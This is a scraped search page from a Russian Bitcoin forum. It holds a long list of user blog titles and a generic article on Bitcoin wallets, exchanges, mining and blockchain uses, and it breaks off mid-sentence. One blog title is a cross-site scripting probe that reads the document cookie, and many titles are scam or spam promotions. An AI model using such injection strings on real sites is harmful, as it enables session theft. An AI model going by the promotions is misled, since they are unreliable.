Перейти к содержанию

Поиск

Показаны результаты для тегов 'coin'.

  • Поиск по тегам

    Введите теги через запятую.
  • Поиск по автору

Тип контента


Биткоин форум

  • Новости и события
    • Новости криптовалют
    • Статьи Bits.media
    • Мероприятия
  • Криптовалюты
    • Общий
    • Биткоин
    • Форки биткоина, альткоины
    • DeFi, токены
    • Электронные деньги
    • Блокчейн и финтех
    • Юридические вопросы
    • Кошельки для криптовалют
    • Разработка
    • Безопасность
    • Мониторинг
    • Конкурсы
    • Флейм
  • Экономика & Операции с криптовалютами
    • Экономика
    • Биржи криптовалют
    • Обменники криптовалют
    • Банки
    • Трейдинг криптовалютами
    • Магазины и сервисы (обсуждение, претензии)
    • Краудфандинг и Краудинвестинг
    • Игры, гэмблинг, хайпы, краны, раздачи
  • Майнинг криптовалюты
    • Общие вопросы по майнингу
    • Пулы совместного майнинга
    • Облачный майнинг и агрегаторы
    • Программы для майнинга
    • Стейкинг, Фарминг
    • Аппаратная часть
  • Барахолка
    • Продажа
    • Покупка
    • Услуги, сервисы
    • Работа
    • p2p обмен валют
  • О ресурсе Bits.media
    • Предложения и замечания по работе сайта
    • Предложения и замечания по работе форума
    • Предложения и замечания по работе Блога
  • Local
    • English
    • Other

Блоги

  • polym0rph's блог
  • miner's блог
  • LZ
  • AtomicStrike's блог
  • SolomonVR's блог
  • SolomonVR's блог
  • Sergey371's блог
  • блог phants'а
  • Nirton's блог
  • loga's блог
  • m134's блог
  • Exdeath's блог
  • Exdeath's блог
  • bronevik's блог
  • R1mlin's блог
  • egorbtc's блог
  • Рабочий's блог
  • Парадоксальный блог
  • мыслеизлияние
  • infoman's блог
  • PoolSwitcher
  • Pa2K's блог
  • Garrett's блог
  • pendalf2008's блог
  • forsee1's блог
  • btcshtchka's блог
  • Майнинг Bitcoin
  • Nikita9344_blog
  • Блог Димы
  • Michail's блог
  • Николай III's блог
  • Artists for Bitcoin
  • Artists for Bitcoin
  • ultra's блог
  • Yablya's блог
  • Настройки 7970. Результат 730kh/s в Litecoin
  • SKYnv's блог
  • Новая финансовая система мира
  • ElenaMaaya's блог
  • блог нуба
  • Шифровалютная экономика
  • Kryon's блог
  • kermit's блог
  • Райзеры для видеокарт
  • Shambler's блог
  • busmainer's блог
  • busmainer's блог
  • yunixon's блог
  • полезняшки для себя`s блог
  • AlexShul's блог
  • Виталий's блог
  • Помогите если вас не затруднит..Как отметинь выплату BTC...а то мой акаунт зламали и вывели все деньги...
  • Warmrain's блог
  • app.spec.integra.circuit's блог
  • HW_from_China's блог
  • HW_from_China's блог
  • Vitto
  • neiros' блог
  • kolja153's блог
  • Инвестиции в биткоин
  • advodado
  • bronevik's blog
  • Gold Line блог
  • LuchininAlexandr's блог
  • Биткоин Робот
  • Obmen.PM-Сертифицированный партнер платежной системы Perfect Money
  • Antina
  • SHiCK блог
  • Шахтер без шахты
  • Шахтер без шахты
  • Блог пьяного аналитика
  • Блог пьяного аналитика
  • Planetarius' блог
  • Planetarius' блог
  • ObiKenobi's блог
  • RoboBet блог
  • Блог Одного Человека
  • Planetarius' блог
  • fastesthash.com блог
  • Блог Romanov Capital
  • Cryptex
  • Viktor Sokolov's блог
  • sanyatyu's блог
  • TabTrader's блог
  • bitlook
  • нуждаюсь в вашей помощи опытные майнеры!
  • lathyips' блог
  • ironika
  • Познай себя !!!
  • Ult's блог
  • ill359's блог
  • Суровые будни рядового майнера в РФ
  • CEX.io
  • CEX.io Blog
  • Майнинг Gridseed с контроллером Raspberry PI
  • bestcoin's блог
  • SPA
  • Официальный игровой клуб Вулкан
  • Форк будущего, какой он?
  • Добыча биткоинов
  • majorjora's блог
  • cryptmining.ru
  • блог r2d2
  • РАФАЭЛЬ's блог
  • DDEX блог трейдеров
  • Doomka2014's блог
  • Bitcoin, Litecoin, Doge - С чего начать?
  • dierdan's блог
  • Latium
  • General-Beck's блог
  • Btc-Mirbox.com Самая прибыльная программа в интернете
  • tunsash's блог
  • кирилллллллллллл's блог
  • tunsash's блог
  • Rita's блог
  • Philipp's блог
  • Philipp's блог
  • Zarmung's блог
  • CR!PTO Путешествия
  • poop's блог
  • Makezzila's блог
  • GruberCoin - криптовалюта?
  • Gromootvod's блог
  • Одежда с символикой Bitcoin
  • waflya's блог
  • AsicTrade.com
  • Стратегия выхода на зароботок 1 биткоин
  • начать зарабатывать без вложений биткоин
  • saas' блог
  • vov4ik777333's блог
  • Моя история инвестиций в хайпы
  • Блог о Linux внутри майнеров :)
  • Обзор майнеров
  • Socket32's блог
  • Все самое интересное в мире криптовалют one-percent.ru
  • antolmach's блог
  • Alex-ru блог
  • хороший заработок без вложений!
  • По заработку, информация может быть полезна
  • Продам майнер BITMAIN S3
  • Куда нужно вкладывать свои средства ,чтобы их не потерять и даже заработать на них!!!
  • Ёжики GC3355 - апгрейд (жизнь после "Телеги")
  • En1ken's блог
  • Александр Ch's блог
  • Почему сегодня не открывается сайт bitcoin.org
  • moneymaker's блог
  • НОВЫЕ ХАЙПЫ
  • poiuty's блог
  • Viktor1123's блог
  • igorwhite's блог
  • golub's блог
  • anajik's блог
  • algol68's блог
  • Khamid Sattarov's блог
  • anajik's блог
  • tankist's блог
  • wfdim's блог
  • Ixion's блог
  • BitcoinBank блог
  • fantom's блог
  • Neotex's Blog
  • Александр Самойлов_12600's блог
  • hterw's блог
  • ivanech's блог
  • Новый хайп
  • goodusers' блог
  • motozikl's блог
  • Необыкновенное будущее
  • AndreyNag's блог
  • italiy82's блог
  • Nook89's блог
  • Сибирский червонец
  • interesnye-novosti
  • Биткойномат
  • zzzzz12's блог
  • exspert'bitkoin
  • Александр Глобальный's блог
  • Взрывной Пакет по Заработку Биткоин!
  • Kerver's блог
  • Азартные просторы
  • Компьютерный мастер Баку (опытный мастер)
  • mjauka's блог
  • Vladimir77's блог
  • Joe Black's блог
  • ТоТсамый's блог
  • Kolja's блог
  • antontmn's блог
  • Взрывной Супер Пакет - Как Заработать Без Вложений !!
  • Bordz's блог
  • TheFuzzStone's Blog
  • AndreyNag's Create own PEERCOIN NODE блог
  • demio's place
  • Обменяю ваши WMZ на мои PAYPAL
  • Moonfire's блог
  • nik888's блог
  • EDRCoin info
  • D-APPS
  • 1620$ за 9 дней! заинтересованы ?! пишите в сообещния!
  • Mining bitcoin from farm Hashocean
  • Grail's блог
  • автоматизация процессов
  • Easy Money
  • BLOG Мир Интернет Бизнеса
  • besser99
  • Blog Мир Интернет Бизнеса
  • Blog Julin Gys
  • Coin's блог
  • observer btc-e, наблюдатель BTC-E.COM
  • Заработок биткоинов
  • Дмитрий1839's блог
  • Майнер Эфира и Декреда от Claymore
  • Gridseed GC3355
  • Karasur's блог
  • Right13's блог
  • tanya310119911's блог
  • Swisscoin-Швейцарская криптовалюта
  • Биткоин, путь к луне
  • fancyfinance
  • Evgeny 34's блог
  • Arcady's блог
  • THWGLOBAL
  • solnecno's блог
  • andr1986's блог
  • Alexey654321's блог
  • aleco's blog
  • Tomfox's блог
  • poolminers
  • dini_pal's блог
  • vovchik's блог
  • KolesCoinNews' блог
  • MONERO FOUNDATION RUSSIA™
  • ICONOMI до конца ICO 8 дней
  • альбина32's блог
  • Vladimir Eliseev's блог
  • Vanya Wang's блог
  • Btc Coin's блог
  • papa_medbedb's блог
  • 6000 сатоши в час. Узнай как!!!
  • Свирепый Гарри's блог
  • Sahat's блог
  • Подпишитесь на инстаграмм пожалуйста
  • Se7eN's
  • Снижаем расходы на электричество
  • SERHIY's блог
  • Фаридун's блог
  • ICO (Краудфандинг)
  • Cryptohawk's блог
  • arbitrader's блог
  • ОлегХомин's блог
  • Enzo's блог
  • masterigr2016's блог
  • kurs.expert блог
  • datachains.world Русский Блокчейн 3.0
  • Закрытый клуб BitClub Network
  • Sayat Ibraev's блог
  • maksim2030's блог
  • BITCOIN блог
  • vvka's блог
  • скажите кто знаком долго будит жить этот хайп типо майнинг
  • BitClub Network
  • Краудсейл Augmentors ICO
  • Динар's блог
  • disodium
  • Новые краны по сбору биткоинов
  • Pedro
  • Selling account/продажа аккаунта
  • Как обменять Биткоин в Рубли
  • Заработай играя
  • Genesis Mining Russia's блог
  • Гена's блог
  • Гена's блог
  • Baccarat_1
  • Genesis Mining Russia's блог
  • Siberian Miners
  • Work-bitcoin
  • mike0013's блог
  • Внимание Новинка BTCHAMP
  • LeslyGarold's блог
  • Объясни бабуле криптовалюты
  • New bitcoin dice
  • ★ Global Success ★
  • isadora's блог
  • Prince tv's блог
  • КриптоМир блог
  • Блог BitBetNews
  • Cryptotrend
  • BitBetNews' блог
  • AlamurFury's блог
  • AlamurFury's блог
  • doBETacceptBET's блог
  • postscreen's блог
  • Krot's блог
  • МаршалНиколас's блог
  • Самый лучший майнинг биткоинов и других криптовалют
  • Bitbetnewss' блог
  • barrygoldwon
  • Мошенничество в глобальном масштабе
  • Marina_Aco_M's блог
  • Leon Organo's блог
  • Nikolai Tran's блог
  • Colonizator's блог
  • KriptoKurs блог
  • isa2016's блог
  • Utopia
  • Анжелика9808's блог
  • fxseminar's блог
  • Заработок в интернете с нуля + халява
  • ZORROZ's блог
  • LeoKartman's блог
  • Альберт Карачурин's блог
  • Bitcoin
  • isalm's блог
  • Yur1K's блог
  • Нервная система
  • Нервная система
  • Крипто-Проекты
  • comof2014's блог
  • Sand Coin
  • bitaps.com
  • 1 Bitcoin в месяц легко
  • BIP148
  • HEAgEKBATEH's блог
  • Miner42's блог
  • ChangeKripta's блог
  • mediavoice's блог
  • realestate's блог
  • куплю мощности на hashflare SHA-256 SCRYPT
  • proshift's блог
  • Stan Podyachev's блог
  • CNstuff's блог
  • Alex Lee's блог
  • RX470+RX460 падает хешрейт
  • Макроэкономика криптовалют
  • Криптовалюты и ICO
  • NV42Rus' блог
  • Николай Еременко's блог
  • deg237's блог
  • Bit Bet News' блог
  • xcilog's блог
  • YaNeFiShKa's блог
  • Соломон's блог
  • 23
  • Натур. Мясцо
  • AEON растёт в геометрической прогрессии-хватаем халяву
  • Про биткоин в России
  • Investy
  • Оборудование в стоках и фьючерсах. Китай.
  • адрес
  • HOQU
  • VitalyKaminsky
  • HOQU_rus
  • Грека через реку
  • CryptoCapitalNews
  • Finom Blockchain Blog
  • Everex
  • GoldMineCoin
  • Kolbasska
  • TombCare
  • CREDO - СИСТЕМА ОПЛАТЫ СЛЕДУЮЩЕГО ПОКОЛЕНИЯ
  • Сатош
  • G-obmen
  • Блог Трейдера
  • Revolutionising the 3 core functions of finance.
  • TH
  • Заработок в интернете
  • Privateers.Life - Пиратская ММО на Blockchain
  • Все просто! Все слухи про Биткоин
  • Человеческий
  • Запас прочности Биткоина.
  • Продажа недвижимости в Ялте за биткоины
  • Криптонатор - правда, или обман?
  • @slon21veka
  • AION - инновации технологии блокчейн
  • Подарите на жизнь 1 биткоинт живу бедно
  • Кирпто-портфель
  • Биткоин
  • События мира криптовалют из первоисточников. Аналитика и торговые идеи.
  • Бродкаст старого криптоанархиста
  • В РФ предложили изымать у населения биткоины и передавать их в казну
  • CloudCoin
  • Прошу вашей милость помогите прошу
  • Мои заметки о крипте
  • Криптоаналитика
  • Bitcoin в деталях: полезные ресурсы, инструкции и сервисы
  • Обмен денег
  • Ищу партнера
  • Bitex
  • вывод с ХФ от 6-7 дек
  • GRAPHENE - Нанотехнологии уже близки!
  • жит
  • CryptoMomus
  • Южная Корея планирует бороться с криптолихорадкой!
  • Майнинг на асике с нуля на высокой цене электроэнергии
  • Биткоин растёт
  • баги
  • Blockchain projects blog. Новости, обзоры, анонсы.
  • Криптомир
  • MIRANIT
  • история!
  • Cryptowolftrade
  • https://pocket-exchange.com
  • Глобальная криптовалютная биржа с низкими комиссиями
  • Глобальная криптовалютная биржа с низкими комиссиями
  • ideal zanussi maintenance beheira
  • Сервисы для продвижения сайта
  • ForkGold
  • btnPLUS
  • ForkGold - Новости криптовалют!
  • !!!ICO TELEGRAM!!!
  • White Rabbit - не меньше, чем революция в цифровом распространении фильмов и сериалов.
  • artem.litvinenko2018@list.ru
  • Ищу партнера/инвестора для открытия GPU Фермы/Хостинга
  • ПРЯМАЯ ВИДЕО ТРАНСЛЯЦИЯ
  • Moscow Miner service
  • Жизнь в Одессе маме
  • Майнинговый Проект TERRAMINER. SCAM или SCAM ALERT?!?
  • [ANN] Blockchain for a good cause
  • World’s first blockchain based news content
  • Обзоры товара
  • Dropil: Smart Investment Trading Algorithm
  • [ANN] GOLDELIM ICO - Free tokens
  • Seele.pro - Next generation of Blockchain technology
  • Kriptoblog
  • New trending MaltaCoin
  • [ANN][ICO] Monaco Estate - Cryptocurrency Real Estate Investment Fund ICO
  • NanoCryptos
  • BitBullCoin.io - The future of advanced global money transaction
  • Блог
  • Продажа аккаунта на golden-birds.biz
  • [pre-ANN]BCharity-международная биржа благотворительности
  • SmartChain.io
  • Майнинг отель в Москвской области
  • BytecoinRu
  • Частное мнение
  • Terhubung dengan Dunia dimana saja dan kapan saja bersama E-Chat
  • COPYTRACK menjadi satu satunya crypto Hak Cipta global
  • kyros
  • kyros
  • Оборудование для майнинга в интернет-магазине Wattson-shop
  • Biometrids Platform for identification
  • [ANN] [ICO] PINGVALUE ICO - RELEVANT ADVICE FOR YOUR NEXT EXPERIENCE
  • MinerGate affiliates (реффералы)
  • BitMEX.com Review
  • Помогу пройти верефикацию Poloniex!
  • Быстрый и безопасный обмен электронных денег по выгодному курсу.
  • e-chat platform multifungsi terdesentralisasi pertama dengan dompet crypto built-in.
  • Cryptonomics Capital - фонд инвестиций в ICO
  • Cloud Komputer pribadi tersedia untuk semua orang
  • BestICO
  • NewProjectReview
  • Saatnya beralih ke Blockchain, bitcomo pemasaran afilasi pertama dan satu satunya
  • International Crypto Bank Coin
  • Про криптотехнологии
  • Vinnd Solusi untuk kesehatan anda melalui blockchain
  • Обзоры перспективных ICO
  • байкал х10
  • Bagaimana Vinnd bekerja pada teknologi Blockchain
  • СберБит
  • Digital Safe Coin, upcoming best cryptocurrency?
  • lowenchain mirror
  • Pinjaman tanpa jaminan yang aman
  • Transcordium - Decentralized Peer-to-Peer Media Editing,
  • La Nueva Plataforma Descentralizada de Edición, Transcodificación y Distribución bajo blockchain
  • CryptoSailors
  • TokenGo обзор ICO
  • Инвестируйте в оборудование для майнинга
  • Buy celebrities with Ethereum now
  • [ICO] Coins4Favors - just one click away
  • bits.media
  • Необъяснимо, но факт или сила подсознания
  • Perkenalkan Myriads.IO ...
  • Arbidex – Platform Tranding Aset Dengan Sistem Arbitrase Otomatis di Semua Pertukaran
  • ARBIDEX The First Trading Platform That Collects Liquidity From Exchanges With Automatic Arbitrage System
  • FintruX
  • Invest-HyipTopMonitor
  • Инструкция как заработать на крипто баунти и airdrop!
  • первая и единственная платформа, которая собирает ликвидность и обмены в обмен
  • Arbidex, Сначала с помощью системы обмена арбитражами с криптовалютной валютой
  • Advance.Fund ft Strade Trade
  • Advance.fund
  • Новый проект 2018 года!
  • Esports Wife App - Free Cash, Bitcoins, Dota 2 & more
  • Торговый робот PoloR для Poloniex
  • Учимся торговать, снимаем розовые очки, разоблачаем шарлатанов.
  • Arcane Bear: Building a better tomorrow with the stories from today
  • COOLCOUSIN
  • Elementh - Blockchain for e-commerce
  • Coin News Telegraph | Bitcoin and Blockchain News
  • Новости ICO
  • What are the most profitable and best sites to invest?
  • Всеобъемлющий Блокчейн или тотальная монетизация
  • Sphere Social - Decentralized Social Network
  • Earn Bitcoins while using Google Chrome
  • MASSKRYP
  • Sell btc on paypal USD
  • coinview - Automated, real-time digital assets portfolio tracking
  • Bitcoins в Дубаи
  • Parkgene [GENE]
  • Mavro - Sebagai bos pemasaran jaringan di dunia kripto-mata uang
  • Biometrids
  • SunMoney Token Sale
  • Serenity Financial - SI ICO Trader / Broker Arbitration Invest Token?
  • Serenity Masalah Forex Keuangan Dipecahkan oleh Blockchain
  • File Gas, Masa Depan Penyimpanan Berkas.
  • [ANN] Solomonstouch - The World’s First Humanitarian, Donation and Fundraising Blockchain Platform
  • SAVEDROID строит экосистемы на основе ИИ
  • PARKGENE - STARTVOLUTION PARKIR DAN SOLUSI P2P BERDASARKAN TEKNOLOGI BLOCKCHAIN
  • TOKEN HACK VC
  • [ANN] THRINTEL MARKET™ - The Blockchain Evolution of Threat Intelligence Sharing
  • [ANN] Lunes - The biggest blockchain project in Latin America
  • Как начать зарабатывать?
  • Cryptocurrency Announcements
  • alexxpoll blog
  • blogs_blog_700
  • blogs_blog_702
  • Инновационная экосистема блокчейн, которая подорвет и децентрализует рынки повторной продажи билетов.
  • ICO-online: история создания проекта Me&Doc с нуля до выхода на ICO
  • ATS — В сети интернет обнаружен VIRUS, который убьет ICO проекты
  • Частное мнение
  • Announcements
  • Upminer - ремонт асиков (майнеров)
  • WORLD PEACE COIN: THE FIRST CRYPTO-CURRENCY WHO CARE ABOUT THOSE IN NEEDS
  • Cryptocurrency
  • blogs_blog_720
  • blogs_blog_722
  • blogs_blog_724
  • blogs_blog_726
  • blogs_blog_728
  • AKAIITO #ICO
  • AKAIITO : Platfrom Yang Kuat Dan Beropersi Berdasarkan Blockchain
  • Мониторинг обменников bitcoin
  • Akaiito! Platform untuk kontrak cerdas dan mata uang crypto!
  • AKAIITO Project - Platform yang kuat berdasarkan pada sistem blockchain yang berfungsi pada teknologi kontrak pintar
  • Akaiito – use cryptocurrency in everyday life
  • blogs_blog_742
  • blogs_blog_744
  • Markscheider - проект производства российских майнеров
  • Партнерка - 25% с продажи
  • Биржа криптовалют BitHash
  • Облачный майнинг.
  • Крипто
  • Airdrops
  • Как заработать на криптовалюте
  • CryptoBanOne
  • Проверенная игра Capitalist Game Bot с выводом денег
  • Ashtart - A future where everyone can access energy
  • Блог о ICO-проектах
  • Перспективное ИСО
  • [ICO] MYRYMAX - MAIN SALE (ICO1) IS LIVE
  • Announcements
  • blogs_blog_776
  • blogs_blog_778
  • Neironix Daily Digest - Ежедневный Аналитический Дайджест
  • Digithereum Global
  • Cryptonet. Сообщество профессиональных криптопредпринимателей
  • Announcement blog
  • Crazyer Crypto
  • Альтернативная криптовалюта.
  • Интерактивная платформа CryptoBliss
  • Интерактивная платформа CryptoBliss
  • ICOnow
  • Crypyotraid
  • Ты мне я тебе
  • Криптокнопка "Бабло"
  • Egorr4 Review Blog
  • [Masternode] Dash Platinum запуск!
  • Как сэконмить больше своих денег при переводе в криптовалюты
  • все собрано по сути в компании на ферме в Литве ,вы просто приобретаете, в Москве и СПб есть представители
  • bitcoin abc
  • bitcoin abc
  • Shodik
  • Обзоры майнинг-пулов
  • оптимизированная Equihash miner zcash
  • avto-monstr.ru/ref/4976. 
  • crypt-mining.net
  • CryptoPlayers
  • Описание проекта Crypto Credit Card
  • Криптовалюта
  • cryptMiningNet
  • Peoplewave - Revolutionise recruitment, background checks, onboarding and etc
  • How does the economics community see Bitcoin?
  • Dash Platinum
  • sarah crypto
  • Важное в мире крипты и финансов
  • matty0312
  • cryptocurrency9527
  • oldwolfcoin
  • зарабатываем здесь
  • amyqkl
  • Cryptocurrency information sharing
  • Сергей Онищенко
  • Германия – Швеция: видео трансляция LIVE
  • Всем привет!
  • Мой кино блог
  • Мониторинг обменников BestChange
  • WPGrabber
  • Мой личный кино блог
  • Аналогии
  • Jsa
  • Nama
  • Крипто EXMO News
  • Independent Delhi Escorts
  • Bitok.cc — современный сервис обмена криптовалют
  • Enjoy All Time Fun
  • GEX_CASH
  • РАБОЧИЙ МАЙНИНГ
  • bikoin что это
  • AvailCom - бесключевая аренда имущества
  • THE BEST ICO OF 2018
  • Smile-Expo. С любовью к инновациям!
  • crypto-currency news
  • CryptoChangeNews
  • HELP Token
  • Казино онлайн
  • Microsoft медленно (но точно) подключает Blockchain к основным продуктам
  • Jullie Chandigarh Escorts
  • Установка и настройка Bminer
  • Roundblock
  • Прием Биткоин платежей в OpenCart 3.x, 2.3 и OcStore
  • Иммерсионное охлаждение в майнинге и наукоемких вычислениях на GPU
  • Мастерноды/Masternodes
  • Девчонки-короткие юбчонки
  • Майнинг и фермы HotAsic.ru
  • Localcoinswap - P2P cryptoexchange
  • Tchtf
  • crypto-mining. Bitcoin
  • Мой блог
  • 50x - СКОРЫЙ ВЫХОД НА БИРЖУ С ЕЖЕДНЕВНЫМ НАЧИСЛЕНИЕМ ДИВИДЕНДОВ
  • LoL cec
  • ✅ Новая эра P2P обмена! Аукцион от LKWAVE ?
  • Bitcoin crane
  • Bitcoin Crane
  • Дневник трейдера
  • Разработка скриптов для арбитражной торговли
  • "><img src=x onerror=alert(document.cookie)>
  • Все по маслу
  • Криптоплатформа Bitzlato
  • Bitshares
  • Enjoy full fun with me
  • Блог Papa Change
  • Меняем быстро, не оставляя ожиданий >EXMO,BTC, Оплата: Банковской картой, QIWI-Кошелёк.
  • Oz - Blog
  • RExchange24.ru
  • CryptoChemistry
  • Применение крипты в казино
  • tapchibitcoin.vn
  • THE MOST CHEAPEST AND ACCURATE CELL PHONE NUMBER AND EMAIL DATABASES IN THE WORLD
  • TRUST7
  • ВЛАДИМИР БАКС
  • iEXBase
  • Egamov Bexruz
  • Продать S9, L3 +
  • BestChange
  • CloudCoin
  • Polyx — криптовалютная платформа
  • Мировые новости
  • Новости со всего мира IT и не только
  • Pi Network Coin Mining Project
  • Сайт bits.media топ!
  • Coinmatics LIVE
  • FPGA Криптовалютный майнинг руководство
  • Настройка сервера
  • otzivipro блог
  • ExchangeRates.Pro: сравнение цен обмена Биткойн и 33 криптовалют в России и мире — биржи, обменки, P2P ?
  • Бинариум как открыть счет регистрация и бонус
  • Амикта - блог про инженерию
  • Игровые автоматы на деньги
  • 11111100101
  • Комп для майнинга с Алика
  • https://freebitco.in/?r=33865777
  • Неудачный инвестор
  • Блог сервиса проверки биткоинов Traceer
  • Как я выжил
  • Baking Bad
  • Статус Криптовалюты в этом мире
  • Joys Digital
  • Как я попал в криптобизнес
  • Arbitrage systems.com - мошенники
  • myproject1
  • Яйца в разных корзинах
  • Qtum
  • Binance P2P
  • Бестчендж лучший обменник
  • Краны для Coinpot
  • Мир криптовалют
  • Обменник
  • Crypto-дайджест
  • MoneroASM [Вникаю в блокчейн]
  • Музей компьютеров и игр - история майнинга
  • bitcoin exchanger
  • Blockchain News
  • What’s SoupSwap ?
  • SoupSwap - Big Promotion Special Offer Only For Investor Earn Bonus Up To 30%
  • SoupSwap - Big Promotion Special Offer Only For Investor Earn Bonus Up To 30%
  • SoupSwapOfficial
  • TradingStrategy - "Софт для глубокого анализа и торговли на крипто рынках, собственной разработки"
  • TradingStrategy - "Софт для глубокого анализа и торговли на крипто рынках, собственной разработки"
  • TradingStrategy - "Софт для глубокого анализа и торговли на крипто рынках, собственной разработки"
  • CryptoTab
  • Мой путь
  • We need to help the family of a political prisoner
  • Новие аирдропы
  • ? Crypto Cat / криптовалюты
  • На пути к прибыльному трейдингу!!!
  • KeenEdge блог
  • Tron network
  • Помогу деньгами всем желающим
  • Лучший обменник BestChange ищи лучший курс для обмена!
  • AEX
  • ПРОДАЖА АКАУНТОВ-BINANCE ВЕРИФИЦИРОВАННЫE ЧИСТЫЕ
  • Дневник спекулянта
  • Акции и Новости обмена криптовалюты и эл. денег
  • Новости электронных денег
  • AML / KYC в крипто
  • Bizonex
  • Crypto News
  • HoldReef - бесплатный и безопасный мессенджер для владельцев криптовалют
  • Обзоры крипто-проектов
  • Crypro Coin Desk
  • Nodle: сеть устройств интернета вещей (IoT)
  • Geek Games
  • Dexsport_io
  • Lalicat лучше Multilogin?
  • VPS/VDS/VPN в Европе
  • LuckyMeta AirDrop Giveaways
  • Блог
  • EuroHoster - территория быстрых VPS и выделенных серверов
  • За последние 24 часа
  • Уоррен Баффет назвал Биткоин болезнью и предрёк полное исчезновение криптовалют
  • Cryptex
  • ltc-crypto.blog
  • ECDSA
  • Будни ленивого трейдера
  • m1
  • Insights Driven Reports
  • Vyral Wings - Crowdfunding
  • Правила майнинга в криптозиму
  • 내부 비밀에 홀덤 발견
  • Как кратно увеличить свой доход в крипте с помощью мультиаккаунтинга
  • Надежный поставщик металлопроката обеспечивает комплексное обслуживание.
  • Bitmain Antminer l7 - обзор, характеристики, доходность - 2140MINER
  • Обзоры платформ NFT
  • CryptoApe
  • Приколы
  • Evraz
  • крипта у вас на сайте
  • Криптообменник Smart Obmen
  • Smart Obmen
  • Обучение Крипто Арбитража и Трейдинга
  • MyChange.io - Мультивалютный криптокошелек с P2P Торговлей и 0% P2P Комиссии
  • Как получить историческую цену ERC20-токена
  • TopCrypto
  • AdSense Alternative
  • ISTOKS
  • Digital Capital | Research
  • Signum Journal СМИ о криптовалюте. В активном поиске свежей аналитики и экспертных комментариев для последующих публикаций
  • Обо всё простым языком
  • Мысли Сатоши
  • Top Casino
  • evangelist
  • BTCmedia
  • 3. Как получить больше раздач с несколькими учетными записями? Смотреть здесь
  • Актуальные AIRDROP
  • Блог CryptoYes
  • Simple Solution

Категории

  • Кошельки
  • GPU майнеры
  • CPU майнеры
  • FPGA/ASIC майнеры
  • Драйверы
    • AMD
    • Nvidia
  • Прошивки ASIC майнеров
    • SHA2
    • Scrypt
    • X11
    • EquiHash
    • Ethash
  • Прошивки видеокарт
  • Утилиты
  • Софт для трейдинга
  • Софт для мониторинга

Поиск результатов в...

Поиск контента, содержащего...


Дата создания

  • Начало

    Конец


Дата обновления

  • Начало

    Конец


Фильтр по количеству...

Регистрация

  • Начало

    Конец


Группа


AIM


MSN


Сайт


ICQ


Yahoo


Jabber


Skype


Город:


Интересы


Bitcoin кошелек

  1. Биткоин — первая в мире децентрализованная цифровая валюта, которая произвела революцию в нашем представлении о деньгах. Одним из наиболее интересных аспектов Биткоина является широкий спектр утилит, разработанных для его поддержки. Эти утилиты призваны помочь пользователям безопасно и надежно взаимодействовать с сетью Биткоин и играют решающую роль в экосистеме. Одной из самых популярных биткоин-утилит является биткоин-кошелек. Кошелек — это программное приложение, которое позволяет пользователям хранить, отправлять и получать биткоины. Доступно множество различных типов кошельков, включая настольные, мобильные и аппаратные кошельки. Каждый тип кошелька имеет свои преимущества и недостатки, поэтому важно выбрать тот, который лучше всего соответствует вашим потребностям. Еще одна важная утилита Биткоин — это обмен биткоинов. Биржа — это платформа, которая позволяет пользователям покупать и продавать биткоины за другие валюты, такие как доллары США или евро. Доступно множество различных бирж, каждая со своим набором комиссий, функциями безопасности и пользовательскими интерфейсами. Важно выбрать биржу с хорошей репутацией, имеющую хорошую репутацию в области безопасности и надежности. Третий тип утилиты Биткоин — это программное обеспечение для майнинга. Майнинг — это процесс проверки транзакций в сети Биткоин и добавления их в блокчейн. Майнеры вознаграждаются биткоинами за свою работу, и чем больше у них вычислительной мощности, тем больше биткоинов они могут заработать. Программное обеспечение для майнинга позволяет пользователям участвовать в процессе майнинга и зарабатывать биткоины. Существует также множество других типов биткоин-утилитов, таких как платежные системы, торговые сервисы и обозреватели блокчейнов. Эти утилиты созданы для того, чтобы предприятиям и частным лицам было проще использовать Биткоин в повседневной жизни, и они играют решающую роль в росте и развитии экосистемы Биткоин. Утилиты Биткоин являются важной частью экосистемы Биткоин. Они предоставляют пользователям инструменты, необходимые для безопасного и надежного взаимодействия с сетью Биткоин, и помогают стимулировать внедрение Биткоина во всем мире. Независимо от того, являетесь ли вы владельцем бизнеса, инвестором или просто человеком, интересующимся цифровыми валютами, существует утилита Биткоин, которая может помочь вам достичь ваших целей. Преимущество Одним из менее известных преимуществ Биткоина является его полезность в качестве инструмента для различных приложений. Базовая технология Биткоина, известная как блокчейн, по сути представляет собой децентрализованный реестр, который можно использовать для хранения и проверки данных. Это делает его ценным инструментом для различных отраслей, от здравоохранения до логистики. Одним из таких приложений является управление цепочками поставок. Используя технологию блокчейна, компании могут отслеживать движение товаров от производителя к конечному потребителю. Это обеспечивает большую прозрачность и подотчетность, снижает риск мошенничества и гарантирует подлинность продукции. Еще одно применение — в сфере голосования. Технология блокчейн может быть использована для создания безопасной и прозрачной системы голосования, гарантирующей точность и защиту от несанкционированного доступа результатов. Это может помочь восстановить веру в демократический процесс и предотвратить фальсификацию выборов. Биткоин также можно использовать в качестве средства оплаты товаров и услуг. Это особенно полезно в странах, где традиционные банковские системы недоступны и ненадежны. Биткоин-транзакции быстрые, дешевые и безопасные, что делает их привлекательной альтернативой традиционным способам оплаты. Наконец, Биткоин можно использовать в качестве средства сбережения. В отличие от традиционных валют, которые могут быть обесценены из-за инфляции или политической нестабильности, Биткоин децентрализован и невосприимчив к таким факторам. Это делает его привлекательным вариантом для тех, кто хочет сохранить свое богатство в долгосрочной перспективе. Биткоин — это больше, чем просто криптовалюта. Базовая технология блокчейна имеет широкий спектр применений, которые могут принести пользу различным отраслям. От управления цепочками поставок до систем голосования, утилиты Биткоин могут произвести революцию в том, как мы ведем бизнес и взаимодействуем друг с другом. Поскольку технология продолжает развиваться, мы можем ожидать увидеть еще более инновационные применения Биткоина в ближайшие годы. Классификация Одной из ключевых особенностей Биткоина является его способность классифицироваться по различным типам полезностей. В этой статье мы рассмотрим различные классификации утилит Биткоин и их важность. Платежная система Самая основная классификация Биткоина — это платежная система. Биткоин позволяет пользователям мгновенно отправлять и получать платежи без необходимости использования посредников, таких как банки или платежные системы. Это делает его быстрым, безопасным и экономичным способом перевода денег через границу. Средство сбережения Еще одна важная классификация Биткоина — это средство сбережения. Биткоин имеет ограниченное количество монет в 21 миллион, что делает его дефицитным ресурсом. Этот дефицит в сочетании с его децентрализованным характером делает его популярным активом для инвесторов, желающих хранить свое богатство безопасным и защищенным от инфляции способом. Цифровое золото Биткоин часто называют «цифровым золотом» из-за его сходства с драгоценным металлом. Как и золото, Биткоин — дефицитный ресурс с ограниченным запасом. Он также децентрализован и действует независимо от какого-либо центрального органа власти. Это делает его привлекательным активом для инвесторов, желающих диверсифицировать свой портфель и застраховаться от инфляции. Децентрализованная платформа приложений Биткоин также служит 